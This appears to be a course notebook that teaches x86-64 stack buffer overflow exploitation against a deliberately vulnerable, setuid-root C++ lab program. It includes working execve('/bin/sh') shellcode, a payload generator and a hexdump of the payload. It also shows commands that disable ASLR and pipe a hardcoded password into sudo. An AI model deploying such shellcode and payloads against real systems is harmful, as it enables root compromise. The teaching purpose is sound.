# Stack Overflow on 64-bit x86-64 Architecture

- stack overflow on a 64-bit machine is similar to that on a 32-bit machine
- there are some minor differences and challenges that we need to consider
- significantly expands the number and size of the 32-bit architecture
- x64bit registers are 64-bit (8 byte) wide
- there are 16 general purpose registers prefix with R instead of E
    - RAX, RBX, RCX, RDX, RSI, RDI, RSP, RBP, R8, R9, R10, R11, R12, R13, R14, and R15
- each of these 64-bit registers also has associated 32-bit (e.g., EAX), 16-bit (e.g., AX), and 8-bit (e.g., AL, AH) sub-registers, which can be accessed independently
    - hence 64-bit architecture can run 32-bit programs
- 1 Instruction Pointer - RIP
- 1 Flags REgister (RFLAGS)
- many other special-purpose registers (e.g., segment registers: code segment, stack segment, etc. floating point registers)


## Stack Layout

- the stack layout on a x64 architecture is similar to that on a x86 architecture
- the major difference is how arguments are passed to functions
- in x86, recall that all arguments are passed on the stack in reverse order
- in x64, the first six arguments are passed in registers:
    - `rdi`, `rsi`, `rdx`, `rcx`, `r8`, and `r9`
- if there are more than six arguments, the rest are passed on the stack
- let's say we have a function `foo` that takes eight arguments:
    - `int foo(int a, int b, int c, int d, int e, int f, int g, int h)`
- the first six arguments are passed in registers:
    - a -> `rdi`; b->`rsi`, c->`rdx`, d->`rcx`, e->`r8`, and f->`r9`
- the last two arguments are passed on the stack:

```
lower address       |      ...          |
    ↑               |  local var2       | <- rbp - 16
    ↑               |  local var1       | <- rbp - 8
    ↑               |  caller rbp       | <- rbp
    ↑               |  return address   | <- rbp + 8
    ↑               |  arg g            | <- rbp + 16
    ↑               |  arg h            | <- rbp + 24
higher address      |       ...         |
```

## Zeros in Address - A challenge

- looking at the stack layout above, exploiting a x64 stack overflow is similar to that on a x86 machine
- however, the return address is 8 bytes long
- x64 only uses 48 bits of the 64-bit address space from `0x0000000000000000` to `0x00007FFFFFFFFFFF`
- this means that the return address will always have at least TWO bytes of zeros in the most significant bits
- having`\x00s` in the payload can be a challenge, beacuse the `strcpy`, `cin` functions will stop copying when it encounters a null byte (`\x00`)
- note that gdb will not print the most significant (prefix) zeros, so you will see the address as `0x7FFFFFFFE3C0` instead of `0x00007FFFFFFFE3C0`
- however, in little-endian, the address will be stored as `0xC0E3FF7FFFFF0000`
- this means that the return address will have two null bytes at the end of the address
- even if the `strcpy` function stops copying at the first null byte, the saved return address of the caller will still be overwritten with the correct address with the two null bytes currently at the end of the address
- meaning we only need to copy the 6 bytes and the first 2 bytes are 0's and already available

- let's say we want to overwrite `0x00007FFAAAAAAAAA` with `0x00007FFBBBBBBBBB`
- stack before overflow
```txt

lower address   | ....             |
                | ....             |
 return address | AAAAAAAAAFF70000 |
 
highter address | ......           |

```
- stack after overflow
```txt

lower address   | ....             |
                | ....             |
return address  | BBBBBBBBBFF70000 |
 
highter address | ......           |

```


## Example

- let's compile `/demos/stack_overflow/x64/stack.cpp` with the Makefile in the same directory
- Makefile compiles with all compiler protections disabled
- it also disables ASLR and stack canaries
- it compiles the program as setuid root, so that we can execute the program as root
- must run Makefile with sudo privilege

In [2]:
%pwd

'/home/kali/projects/SoftwareSecurity/notebooks'

In [3]:
%cd ../demos/stack_overflow/x64/

/home/kali/projects/SoftwareSecurity/demos/stack_overflow/x64


In [5]:
%pwd

'/workspaces/SoftwareSecurity/demos/stack_overflow/x64'

In [6]:
! ls

Makefile      exploit.py   peda-session-stack.exe.txt  stack.exe
bad.txt       good.txt	   peda.gdb		       stack_gdb
commands.gdb  pattern.txt  stack.cpp


In [4]:
! cat stack.cpp

#include <cstdlib>
#include <iostream>
#include <cstring>
#include <fstream>
#include <string>

using namespace std;

const int MAX_DATA = 200;

void vulnerable(char *str) {
	char buffer[100];
	strcpy(buffer, str);
	cout << buffer << endl;
}

int main(int argc, char *argv[]) {
	char data[MAX_DATA];
	//file_name = strcpy(file_name, argv[1]
	FILE *fin;
	fin = fopen(argv[1], "r");
	fread(data, sizeof(char), MAX_DATA, fin);
	vulnerable(data);
	cout << "All done..." << endl;
	return 0;
}



In [5]:
! make

g++ -g -Wall -std=c++17 -fno-stack-protector -z execstack -no-pie stack.cpp  -o stack.exe 
# must run make with sudo to disable randomaize_va_space
echo 0 | tee /proc/sys/kernel/randomize_va_space
tee: /proc/sys/kernel/randomize_va_space: Permission denied
0
make: *** [Makefile:24: build] Error 1


In [9]:
! echo kali | sudo -S make

[sudo] password for kali: g++ -g -Wall -std=c++17 -fno-stack-protector -z execstack -no-pie stack.cpp  -o stack.exe 
# must run make with sudo to disable randomaize_va_space
echo 0 | tee /proc/sys/kernel/randomize_va_space
0
sudo chown root:root stack.exe 
sudo chmod +s stack.exe  


In [10]:
! ls -al

total 84
drwxr-xr-x 2 kali kali  4096 Apr  4 14:47 .
drwxr-xr-x 3 kali kali  4096 Apr  2 15:24 ..
-rw-r--r-- 1 kali kali   128 Mar 31 14:20 badfile.bin
-rw-r--r-- 1 kali kali   301 Mar 31 14:20 bad.txt
-rw-r--r-- 1 kali kali   140 Mar 31 14:20 commands.gdb
-rw-r--r-- 1 kali kali  1628 Apr  4 14:46 generate_payload.py
-rw-r--r-- 1 kali kali    51 Mar 31 14:20 good.txt
-rw-r--r-- 1 kali kali  1082 Mar 31 14:20 Makefile
-rw-r--r-- 1 kali kali   500 Mar 31 14:20 pattern.txt
-rw-r--r-- 1 kali kali    93 Mar 31 14:20 peda.gdb
-rw-r--r-- 1 kali kali    18 Apr  4 14:47 peda-session-stack.exe.txt
-rw-r--r-- 1 kali kali   489 Mar 31 14:20 stack.cpp
-rwsr-sr-x 1 root root 32944 Apr  4 14:47 stack.exe


In [11]:
! cat commands.gdb

set args good.txt
break vulnerable
run
next
print $rbp
print &buffer
print "offset: "
print /d (void *)$rbp - (void *)&buffer
continue
quit


In [12]:
# running commands.gdb script
! gdb -x commands.gdb ./stack.exe

GNU gdb (Debian 13.1-1) 13.1
Copyright (C) 2023 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./stack.exe...
Breakpoint 1 at 0x401172: file stack.cpp, line 13.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Use 'set logging enabled off'.

Use 'set logging enabled on'.

[----

In [26]:
# using peda to find the offset using cyclic pattern
# Look for [RSP] --> offset VALUE or [RBP]+8; note NO offset to RIP is printed
! gdb -x peda.gdb ./stack.exe

GNU gdb (Ubuntu 9.2-0ubuntu1~20.04.2) 9.2
Copyright (C) 2020 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./stack.exe...
Writing pattern of 500 chars to filename "pattern.txt"
Breakpoint 1 at 0x4011f6: file stack.cpp, line 11.
[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffd090 ("AAA%AAsAABAA$AAnAAC

In [13]:
# Python script to generate the payload
# make sure to FIX any FIXMEs to match your environment
! cat generate_payload.py

#! /usr/bin/env python3

import sys

# Replace the content with the actual shellcode
# 64-bit execve('/bin/sh') setuid shellcode
SHELLCODE = (
    "\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e"
    "\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57"
    "\x48\x89\xe6\x48\x31\xc0\xb0\x3b\x0f\x05"
).encode('latin-1')

PAYLOAD_LEN = 120  # 112 Offset to rbp + 8 bytes
SHELLCODE_LEN = len(SHELLCODE)
ADD_LEN = 8  # Length of the address 4 for 32-bit and 8 for 64-bit
NOP_LEN = PAYLOAD_LEN - SHELLCODE_LEN

# FIXME if needed
GDB_SHIFT_COMPENSATION = 300 # stack is shigted higher in GDB due to its own environment variables, args, etc.
RET_ADD = 0x7fffffffd090 + GDB_SHIFT_COMPENSATION  # FIXME: Change this address

# Remove the 00 from the address
# Note, 300 is added because the address shown in the gdb is different from
# the actual address shown in the stack when the program is running.
# This is because gdb pushes some values to the stack before running the program.
# You can try different values to get t

In [14]:
! python generate_payload.py

In [19]:
! wc -c badfile.bin

128 badfile.bin


In [16]:
! hexdump -C badfile.bin

00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000050  90 90 90 90 90 90 90 90  90 90 48 31 d2 52 48 b8  |..........H1.RH.|
00000060  2f 62 69 6e 2f 2f 73 68  50 48 89 e7 52 57 48 89  |/bin//shPH..RWH.|
00000070  e6 48 31 c0 b0 3b 0f 05  bc d1 ff ff ff 7f 00 00  |.H1..;..........|
00000080


In [18]:
# create a /bin/sh symlink to /bin/zsh
! echo kali | sudo -S ln -sf /bin/zsh /bin/sh

[sudo] password for kali: 

### Exploitation

- run `stack.exe badfile.bin` from the Terminal to exploit the program with the payload in `badfile.bin`
- the program will execute the payload and spawn a shell as root
- the return address in the payload is many need to be adjusted to land it in the NOP sled
- you may need to do a bit of trial and error to get the correct address to land in the NOP sled
- you can write a bash script to automate the process

## Small Buffer Challenge
- if the buffer is too small to fit the payload, you can't put the payload in the buffer before the return address
- you can't put the payload after the return address because of the null bytes in the return address
     - strcpy will stop copying when it encounters the null bytes
- however, the payload is already loaded into main's stack frame
- you can find the address of the payload in main's stack and use that address as the return address
- this is left as an exercise for the reader